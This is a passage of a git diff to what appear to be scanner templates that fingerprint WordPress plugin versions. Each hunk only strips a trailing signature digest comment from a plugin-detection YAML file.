b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 52d4a0c30a..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000b4887dd169d4f20dbec9ffd099920de0cfb8aab7ad6e072b8d7ab967793505022100aaebb02d59c636d322d2f7263e709bf9b0443b53365e52e8b4d001fc1c495b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index b09a567b64..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068d8281eccca3adcaf0f73fda79ec2dd4578e239f25143e75eea16036022826c022100d93a42f74c0a37e5939fc49a80904752d8012b32487e475d29833df2f6d37046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 83baac132e..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022278b708e3696d38c407449ea7ba2813ac3410cd73bf7f994302aadcfa060f4022023db93cffa53f8c26951e0423acf14bc8551b378c92cb9f661f819be43ca0075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index daf2c7ab04..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066cf876baa9b565ab6541d1dfcfeb3ecfed665f86eab9ac51408245b095588ab022100ee6c165cc7a94c4dbd81cb463d3e26f1c7bbcde588864acf3d4f9774c4d348c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index bee4359f5e..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022005a6dd258ff77aab78c18fbf983b6ae48552984aabda65c1c7ba35024501a4e9022100c36541820ba03c166388d50dd68d28e8df91b07a5d5439868239ab1f0121d4e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 383e0b3409..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c062d8b4b21803d6faee3dc304cc9439a971a63406ba6647c0e56c95c02b947022100851d7a1dba1a0c54c3d323c31b2d06b19e21986f0ceceaabc97281089434d223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index a2602c428f..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aea99cdb5e168ef33afda2938481c3dcafb9196ae0d8e1592a33e46c1b0c1ee2022100efa19a4ca4d634992caa586ed1f998919e69176c6c413d02a4d91298c36b9551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 8a4e6c5e95..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100979b8db91d3c72ea91359957ccd92746a20d60a266e1274432ab492c9f3ba703022025502058d452a7766430cb00498061d19bc176fe96fb1918cbc600e69ba19ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f49477e531..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e5aabb2bee253960734b84bc5e8234701281cbd21e8d44ed3a8eb5ad24beb8702205bcf0081803875ec3ef0d02fa60a326a86be50bde4dd425c651937ffb2447350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c680f9bd70..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220155ff5f184e83253a5ec48786e9b26f5566e3a736e25950fc010c292d6caad53022100811bcb0294a3f3878a37cf8389f7bdf6c9f5f0970686e1106ecda3f502117558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index b1eac7585c..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1ddc3de05b2efcc4b20c7c2f1136c05a04d851eca0a29bc96c9d20df4287c69022056e1756ea4f987e5c1e7e68fd2decb4a0fdc9970b218c180b4615c6da2b7a793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 7d97737d04..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200abfbd4e30f5bdaca1611d5adfe588ed436ea70b20c5c6bf44e930cc2b79cd520221009febda1024b6e8259c977c05374e6e605fec28aaf3b0fec1f7035b972d059d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 390e137cac..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007bdf88fe4ebfc78b25ecb872b24b1e483af0bd72611ebab819a3110e600989e02201182a88be9143767c59c7d02d14a655748d0eeb5322c97c6efbe29833afc246e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index f866a5533c..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4de5a931fce5d5d34dd816472b3dcdcfa036cc1880c8e4d208b92a201a3798b02203f68b59daa3acf4d24b0b2400a94f0ab6b629b09f50d5c7ebe019852946cc5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 2fb21ebd19..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204df94a47e55fa8437071e101e3c782e916e841f5d9695209715cc006ceefdbed02201a612f6f6322d3c3ccf10924a38a86ac6e58d0d89e69e8f8a6bab512d8283f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index daa8a89f1a..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a55fd33d29e0138b9a91dc7b6ec2083f0edbc66504487b8a9abc93111795a7b802203928e312bad9f05be2eeb241da1ba630ec1b71a04eddb51c5ea73c7fe4c41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 43dc5974c1..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203780774630eb0b80372c6d1c86ce2f7d0e7407408c8d8c5fdfc0a3292e698838022100c29ff7b64957923834c61a261aaae9c920d279d90975f7cf0eb45b6307b7105b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index e415e173d1..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017f0ac373d219a2b740f5f6f317e2bed573d250fc8fd11dd63d446eede525e5e0221009d4e23851c6be23f1f2fa8493c8f9d35438206b8acf4e5bd15b3288136e3c771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index bd7699f6ec..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9250325a9c7b7bf3460eb368738763c2e4abbbb3c17514ac499ea928f938e96022100e739dc38ea3d2f9f08245382bca490102d0bd62cacc1cf4c669f542439c5491f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 5d442c68c7..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c74eb22070b786cb852fec72eb6a217cf1ec975219120201cebc771d042ff3d02201f37977697fd5e89423aba864d38ae153c68fb0231f0ddf6c7c242dfde73f3c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 2924cceec7..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca167159b715e7342af379315916c39a861d8fa1db494f49d4eeb0d4c58b042402204347670b2bbda4f8ded5efefe53149deb9769054bb1112a150b9642e1a599b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 6e98acaa55..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063cdb8f40f47d59c3dbbac969cd1cafd1e53454ba2f9234499fdfbb8d8928321022100dceef35ba7254ec3fa06978f8cf1469d8051eaa0ae416d8804d333ba272d96ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 715b7f9fc0..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202be7e42c76f37c1804b3a7283733b749531c3d04dd1be789cb0f13ad48880846022100e97e4a20e5af59389db0388a34278a8d2ed1a4badaab6513759f1069f61a000d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 2262ae47b8..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050761b6503c98f01561111871f9b8eff789ba96db31353e4d908d93c424d3d9202202d9b78c5aa704d3b35e31d1659c93e85e674c2c99d616c21ffcfd79a8fcc9f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 0c61bacf17..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097c9b45a2b0b5ad0d4b20b7151a581cbfdb78425f011984f1d81fe27e798bae202204649eda04f8d32a1bd16d38e17905cae24a61e545207e437a74409d43bf33708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 62a5c2791a..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093208f4544374ead9506bd1274675b2d92afb9d12d6b336d07330d3b7d72d520022059a822256b284f210bdf8653d3a10a97004e074320ec5cd1d0ce66fd37d7b3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 67b382c9a4..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f813791da6cc7113b0d45b986d1c705b6fe329dd430e0555cb06c588c76fd3c02206c6ff0d281972bc079ff8342dfb33eb165182de4bd42263fc2fdc802b04970cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 7cea615685..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f73fe06556ca4f14e6dbefd0574e1f4a1aed39038be0cc266519a51131adcada022100f3f88eaa0d3be61fecb6f65ba1c56aefd5996813813c6862c6ebccbebf366abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 5f30c9078d..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be3fa22aff21f7db47174dce95fdc5448a1dd087a4ed3e9047600af7bbff593e022100e5b6f5e099925e40598dbe6554c6301dea8b3c8e983d1579a72a2e6d5acec917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index d67838e39c..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099f5e88a5d21c69667d22e471b9113511a354419da86194c1880a4ee7f73719d02200726c12e2486232ad6185b5d0d8f95526741e76867adcb4edefc4c7b77e5e093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 62976fadac..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008855339c7751b360e33b130b461233c593c6a30423f18462ca2857fe7d59b02f022100bfbd7ddca6bead14e3e312460edb487edd28b98911bbfe27a20fab442e1aa93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index a099a483a0..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201013c5bbbcab93d63627dfeca448d2481d0a84656d2ff76777523f1942a36a68022100ecb7b63531f2bbdc2ca51fabb471c862dd87a60fcab5e528a2f03a42e124c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 8fa01a96e7..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d7a0824c64cac98d593febc8f31b009126933752c3e9d27f7fbfed3e82725ea02202bc9e186b674790e3bcf1d4694f9dd5c0879248b64d84c6ceb2a6b3189146985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 0741418c0d..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b77f3b600a06cbbf5fd625f623a3b21caadc7d0c6f665b71f8cc535c27ccceb9022100fb8e58140097038269b37cd2a6021df8aa77237aff6dcb61773cd6bc1c0adffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 895cdb890e..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b54da4213f440867f265f89f3691ba60dc03f536bae6561ff68e661937b49990022100eca20a2bb85cd12a4cfca7582a6b8a0a4acbc6e8c9af0233261410bf72f1318b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 0e1994a4fc..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a38fe02b7265c26c09d083403e553b939a8e12857204c36c7b89e7c7328e4ba0022100e9db293cf44de1a5c082216149e10a94c76af90532fbb0aab04c6e3970224474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 4314a4073b..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220490cbdf83a0c7138b5a22ac57849dc5bcc6a5a9f0d8768c8f26ccf9bd73b90d2022100ff5dee04a1d41a2abcb9d30ae0fd8d9ab214e6959050e8fc9703a22b9ccde6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 628dae26e6..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0460b28e72144a570127a8a152d0a1df737c4739caf5b363463da3ae50def010221009bbed5b55f4da0a4ca2d5399a40654a19c08c0a03808078a3f6ca3cb7ac6f52f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7e505846ff..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f0bc1e6e42412e800058e3a38a3359014075f7ac76b91a4129e0d495770c7bc022100a1d4850a69daa1df5a4a6ddccb2d5d3e0166325199c21a79ba5a9e3d4c39def8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index fc5dee5b00..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201b48c84fc07db2502c03f777a2a67e414369635f96fa1368db46c4d1e1ff86c8022100c836f1fc9cf3962922c1c93f35a066ba78ad5866d3c31ed6c6fa99dea9a73481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 54f14ff439..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b6da2d686ac6a328e6e91ffa150a155418984677df6bdebb65967ab9e85d76802202faa25a0478e896185597b7b3cafab51d67b08f3b2eb16c84c6e4bfe94c86f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 51b323580a..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7217d896958cb05697bb3a37e8cf0a3dcdf43013986ebc289178643cd6b0960022054842db494950f0c1e2179b41c7ded3dad71eff105402496181ebae25c7901f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index e0e73ec015..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d349af52ec14d5a3159d65c082a65a987efc95ca24153d8780f3dd3a4238100a022100c6c95d51fc5f70ad3cbd948af45e7cbf471841672fd232fa0da0817214671b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f16ad833e4..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f00ea28c2555739c2f201991b222d8726994383aba5e12ef181c730cdf6514ed02201983698d472efbf280b8e83143928eb2a82026b283a1eb8a990db9d6e018469a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 35804d6210..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030cd35a3a89bbc9792988aa02e4c66df96b19b332dc9e313363dc5201602001802205e82fb8496a6cd9056ac66599f3341d023d68524d097438727eab096feb73501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index adf53f064f..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205212c8b7e83bf81f59d32a4ce8101641b6d77e7bb070cd54da5c5c36ac211d170221008f4cb36e35eb3a4df0930fee33903405d4d69d01dd1518755b4989674d15afde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 70fd52525e..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 